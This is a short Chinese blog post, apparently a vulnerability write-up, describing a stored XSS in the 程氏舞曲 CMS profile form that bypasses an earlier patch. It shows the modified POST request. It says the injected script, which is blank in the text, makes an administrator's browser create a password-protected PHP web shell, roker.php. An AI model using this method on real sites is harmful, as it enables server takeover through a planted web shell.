程氏舞曲cms 又一 储存型xss

Author:Roker
上次 提交乌云 后 ,官网果断修补了、、、but,貌似不太彻底啊。
直接说 方法吧~
同样修改 资料处。
火狐 修改下 post包提交
[php]
CS_Name=aaaaaa&CS_Email=a%40qq.com&CS_Nichen=aaaaaa&CS_Sex=0&CS_City=%C1%C9%C4%FE%CA%A1&CS_QQ=111111111&CS_Qianm=[/php]

发现 后台还是可以 添加任意文件。。于是构造我们的js 如下
[php]

>

[/php]
管理员触发到xss后
就会 在 skins\index\html\目录下生成 roker.php 密码123的一句话

发表评论